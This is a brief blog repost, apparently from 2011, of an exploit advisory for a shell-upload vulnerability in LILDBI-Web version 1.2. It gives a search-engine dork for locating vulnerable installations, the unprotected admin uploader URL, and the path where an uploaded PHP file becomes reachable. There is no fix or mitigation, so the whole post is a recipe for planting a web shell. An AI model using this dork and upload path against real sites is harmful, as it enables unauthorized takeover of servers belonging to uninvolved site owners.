Monday, April 4, 2011

LILDBI Shell Upload Vulnerability

# Date: 23.07.2010
# Software Link: http://productos.bvsalud.org/product.php?id=lildbi-web?=en
# Version: 1.2
# Tested on: Ubuntu ( Linux ) - WinXP sp2/sp3


Dork :  allinurl:"/lildbi/

POC :
The shell upload page :  http://target.com/[path]/lildbi/e/admin/uploader.php

File Desination : http://target.com/[path]/lildbi/e/admin/files/[name].php

No comments:

Template by : mhiman@ hacker-newbie.org